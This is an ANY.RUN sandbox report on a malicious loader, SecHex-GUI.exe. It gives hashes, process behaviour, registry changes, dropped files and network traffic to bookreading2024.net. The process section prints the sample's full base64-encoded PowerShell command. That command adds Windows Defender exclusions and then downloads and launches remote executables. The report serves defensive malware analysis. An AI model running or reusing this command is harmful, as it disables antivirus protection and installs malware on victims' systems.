File name:

SecHex-GUI.exe

Full analysis: https://app.any.run/tasks/b706d06e-139b-4611-88d6-af42b42f1686
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: July 18, 2024, 18:38:01
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
susp-powershell
loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5:

22DA7C7190FB8A49C42E452237C69237

SHA1:

8423A794CFFDB91D923E84A755E93F891C14AA63

SHA256:

6A8E11EAED482324160A1A391FFA7F2A5D126ABE3CD4B724B8F8141B3B9D8AF8

SSDEEP:

98304:lRMtUeCgLNe9sLt7LEPzkouw5/DBhoYWUtN01kOnNmrDcvevM5YE+gVu7xVBUaZp:vi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • SecHex-GUI.exe (PID: 7044)
      • powershell.exe (PID: 2356)

  • SUSPICIOUS

    • Reads the date of Windows installation

      • SecHex-GUI.exe (PID: 7044)

    • Reads security settings of Internet Explorer

      • SecHex-GUI.exe (PID: 7044)

    • BASE64 encoded PowerShell command has been detected

      • SecHex-GUI.exe (PID: 7044)

    • Starts POWERSHELL.EXE for commands execution

      • SecHex-GUI.exe (PID: 7044)

    • Base64-obfuscated command line is found

      • SecHex-GUI.exe (PID: 7044)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2356)

  • INFO

    • Checks supported languages

      • SecHex-GUI.exe (PID: 7044)

    • Reads the computer name

      • SecHex-GUI.exe (PID: 7044)

    • Process checks computer location settings

      • SecHex-GUI.exe (PID: 7044)

    • Disables trace logs

      • powershell.exe (PID: 2356)

    • Checks proxy server information

      • powershell.exe (PID: 2356)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2356)

    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • powershell.exe (PID: 2356)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.3)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 6
CodeSize: 1024
InitializedDataSize: 7680
UninitializedDataSize: -
EntryPoint: 0x9bc40c
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.6.0.0
ProductVersionNumber: 1.6.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Unknown (0)
ObjectFileType: Unknown
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: SecHex-GUI
FileTitle: SecHex-GUI.dll
FileDescription: SecHex-GUI
FileVersion: 1,6,0,0
LegalCopyright: -
LegalTrademark: -
ProductName: SecHex-GUI
ProductVersion: 1,6,0,0
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
123
Monitored processes
4
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start sechex-gui.exe THREAT powershell.exe conhost.exe no specs sechex-gui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2356"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAeQB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbQBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBhAGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQB0AHYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAHIAaABlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwB6AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdQBxAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAHMAaAAvAFMAZQBjAEgAZQB4AC0ARwBVAEkALgBkAGUAcABzAC4AagBzAG8AbgAnACwAIAA8ACMAeAB6AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB1AGIAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB2AGwAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwBIAGUAeAAtAEcAVQBJAC4AZABlAHAAcwAuAGoAcwBvAG4AJwApACkAPAAjAGkAegBuACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBzAGgALwBTAGUAYwBIAGUAeAAtAEcAVQBJAC4AZABsAGwAJwAsACAAPAAjAGUAaQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdwBwAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgB1AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMASABlAHgALQBHAFUASQAuAGQAbABsACcAKQApADwAIwBlAGMAdwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AcwBoAC8AUwBlAGMASABlAHgALQBHAFUASQAuAHAAZABiACcALAAgADwAIwBkAHUAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAegBsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHIAdgBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAZQBjAEgAZQB4AC0ARwBVAEkALgBwAGQAYgAnACkAKQA8ACMAYQB0AGkAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAHMAaAAvAFMAZQBjAEgAZQB4AC0ARwBVAEkALgByAHUAbgB0AGkAbQBlAGMAbwBuAGYAaQBnAC4AagBzAG8AbgAnACwAIAA8ACMAZABiAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHcAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGwAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwBIAGUAeAAtAEcAVQBJAC4AcgB1AG4AdABpAG0AZQBjAG8AbgBmAGkAZwAuAGoAcwBvAG4AJwApACkAPAAjAGoAegBoACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBzAGgALwBTAGUAYwBIAGUAeAAtAEcAVQBJAC4AZQB4AGUAJwAsACAAPAAjAHUAagBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYQByAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgB0AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMASABlAHgALQBHAFUASQAuAGUAeABlACcAKQApADwAIwBkAHEAaAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AbQAvAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACwAIAA8ACMAbgB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AG0AeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAGIAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwApACkAPAAjAGYAdQB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAawB6AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAGQAbQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAGcAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBtAGcAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAHEAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBlAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAHQAdwB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAaQBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHIAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwBIAGUAeAAtAEcAVQBJAC4AZQB4AGUAJwApADwAIwBjAGUAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBiAHMAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBxAGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQA8ACMAaQBqAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAaABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwApADwAIwBkAGMAcgAjAD4A"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
SecHex-GUI.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
4928\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7044"C:\Users\admin\Desktop\SecHex-GUI.exe" C:\Users\admin\Desktop\SecHex-GUI.exe
explorer.exe
User:
admin
Company:
SecHex-GUI
Integrity Level:
HIGH
Description:
SecHex-GUI
Exit code:
0
Version:
1,6,0,0
Modules
Images
c:\users\admin\desktop\sechex-gui.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
7972"C:\Users\admin\Desktop\SecHex-GUI.exe" C:\Users\admin\Desktop\SecHex-GUI.exeexplorer.exe
User:
admin
Company:
SecHex-GUI
Integrity Level:
MEDIUM
Description:
SecHex-GUI
Exit code:
3221226540
Version:
1,6,0,0
Modules
Images
c:\users\admin\desktop\sechex-gui.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
Total events
7 883
Read events
7 852
Write events
31
Delete events
0

Modification events

(PID) Process:(7044) SecHex-GUI.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(7044) SecHex-GUI.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(7044) SecHex-GUI.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(7044) SecHex-GUI.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2356) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2356) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2356) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2356) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2356) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2356) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
2
Suspicious files
3
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
2356powershell.exeC:\Users\admin\AppData\Local\Temp\SecHex-GUI.dllexecutable
MD5:AD714EE48D2E829C5012C65DE6166C05
SHA256:7D32D13D123871650794A1E172ADC70BC8DAFBDB762F49D889F813844D532B20
2356powershell.exeC:\Users\admin\AppData\Local\Temp\SecHex-GUI.pdbbinary
MD5:D2F1182DA0077F1E60E33F1EFA03584A
SHA256:593169A5292387FF27C5C5DE33DB0FA1EAF65290FD52C6FF93D49233E7EBDEBC
2356powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wlgqzehi.vp4.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2356powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bghvwyns.vp3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2356powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ehplvdfh.sr0.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2356powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:D5DD617E0584B6DADE2F25DC03E28545
SHA256:438ECB11A1DF3FBF2512B40590BB9E998A7CC152ED9C97D0E069C8BB21B13A59
2356powershell.exeC:\Users\admin\AppData\Roaming\sphyperRuntimedhcpSvc.exeexecutable
MD5:280F228A0FD9232C72C66646F5AC8F27
SHA256:6AACE057C548DF95831B928AAB373130BC09F5636FB7FFF52372B4280F2FFE51
2356powershell.exeC:\Users\admin\AppData\Local\Temp\SecHex-GUI.runtimeconfig.jsonbinary
MD5:D720176A229E9D969B40FABEB0BAF62E
SHA256:321B4E463BBACD6113AA337511BDEBF5E7356E9971744346B28424607C7B483A
2356powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3ym2dhtl.ypc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
24
DNS requests
7
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
188.114.96.3:443
https://bookreading2024.net/cl/sh/SecHex-GUI.runtimeconfig.json
unknown
binary
266 b
unknown
GET
200
20.199.58.43:443
https://fd.api.iris.microsoft.com/v4/api/selection?&asid=AA58E93E83F94331A6473BB7D688A4A2&nct=1&placement=88000677&bcnt=30&country=US&locale=en-US&poptin=0&fmt=json&arch=AMD64&chassis=1&concp=0&d3dfl=D3D_FEATURE_LEVEL_12_1&devfam=Windows.Desktop&devosver=10.0.19045.4046&dinst=1661339444&dmret=0&flightbranch=&flightring=Retail&icluc=0&localid=w%3AAC7699B0-48EA-FD22-C8DC-06A02098A0F0&oem=DELL&osbranch=vb_release&oslocale=en-US&osret=1&ossku=Professional&osskuid=48&prccn=4&prccs=3094&prcmf=AuthenticAMD&procm=Intel%28R%29%20Core%28TM%29%20i5-6400%20CPU%20%40%202.70GHz&ram=4096&tinst=Client&tl=1&pat=0&smc=0&sac=0&disphorzres=1280&dispsize=15.3&dispvertres=720&ldisphorzres=1280&ldispvertres=720&moncnt=1&cpdsk=260281&frdsk=218542&lo=3609277&tsu=999807
unknown
binary
102 b
unknown
GET
200
104.126.37.146:443
https://www.bing.com/client/config?cc=US&setlang=en-US
unknown
binary
2.15 Kb
unknown
GET
200
188.114.97.3:443
https://bookreading2024.net/cl/sh/SecHex-GUI.deps.json
unknown
binary
55.9 Kb
unknown
GET
200
188.114.96.3:443
https://bookreading2024.net/cl/sh/SecHex-GUI.dll
unknown
executable
1.34 Mb
unknown
GET
200
188.114.97.3:443
https://bookreading2024.net/cl/sh/SecHex-GUI.pdb
unknown
binary
32.9 Kb
unknown
GET
200
188.114.96.3:443
https://bookreading2024.net/remote/sphyperRuntimedhcpSvc.exe
unknown
executable
2.31 Mb
unknown
GET
200
188.114.97.3:443
https://bookreading2024.net/cl/sh/SecHex-GUI.exe
unknown
executable
144 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
20.74.47.205:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
unknown
4716
svchost.exe
40.126.31.73:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
7856
svchost.exe
4.208.221.206:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
239.255.255.250:1900
whitelisted
40.113.103.199:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1796
backgroundTaskHost.exe
20.199.58.43:443
fd.api.iris.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
unknown
3444
backgroundTaskHost.exe
104.126.37.131:443
www.bing.com
Akamai International B.V.
DE
unknown
2760
svchost.exe
40.113.103.199:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2356
powershell.exe
188.114.97.3:443
bookreading2024.net
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
arc.msn.com
  • 20.74.47.205
whitelisted
login.live.com
  • 40.126.31.73
  • 20.190.159.73
  • 40.126.31.71
  • 40.126.31.67
  • 20.190.159.2
  • 20.190.159.68
  • 20.190.159.64
  • 20.190.159.23
whitelisted
google.com
  • 142.250.185.142
whitelisted
fd.api.iris.microsoft.com
  • 20.199.58.43
whitelisted
www.bing.com
  • 104.126.37.131
  • 104.126.37.146
  • 104.126.37.163
  • 104.126.37.144
  • 104.126.37.160
  • 104.126.37.153
  • 104.126.37.137
  • 104.126.37.161
  • 104.126.37.170
whitelisted
bookreading2024.net
  • 188.114.97.3
  • 188.114.96.3
unknown
client.wns.windows.com
  • 40.115.3.253
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
SecHex-GUI.exe